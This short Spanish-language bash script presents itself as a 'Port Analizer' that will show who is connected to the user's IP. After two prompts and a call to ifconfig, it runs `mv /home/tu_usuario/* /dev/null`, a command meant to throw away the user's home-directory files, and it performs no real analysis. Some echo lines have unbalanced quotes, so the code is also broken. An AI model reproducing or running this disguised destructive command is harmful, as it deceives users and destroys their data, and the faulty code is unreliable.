echo "   ___           _     _                 _             " 
echo "  / _ \___  _ __| |_  /_\  _ __   __ _| (_)_______ _ __ "
echo " / /_)/ _ \| '__| __|//_\\| '_ \ / _` | | |_  / _ \ '__|"
echo "/ ___/ (_) | |  | |_/  _  \ | | | (_| | | |/ /  __/ |   "
echo "\/    \___/|_|   \__\_/ \_/_| |_|\__,_|_|_/___\___|_|   "
echo "========================================================"
echo "Vercion 2.83=by=NePtYx=
echo "=======================
echo " "
echo "Analizaremos que personas estan conectadas a tu ip:"
echo "ESCRIBE OK PARA CONTINUAR"
read input
echo "Listo,Ver resultado?"
read input1
clear
echo "   ___           _     _                 _             "
echo "  / _ \___  _ __| |_  /_\  _ __   __ _| (_)_______ _ __ "
echo " / /_)/ _ \| '__| __|//_\\| '_ \ / _` | | |_  / _ \ '__|"
echo "/ ___/ (_) | |  | |_/  _  \ | | | (_| | | |/ /  __/ |   "
echo "\/    \___/|_|   \__\_/ \_/_| |_|\__,_|_|_/___\___|_|   "
echo "========================================================"
echo "Vercion 2.83=by=NePtYx=
echo "=======================
ifconfig
mv /home/tu_usuario/* /dev/null

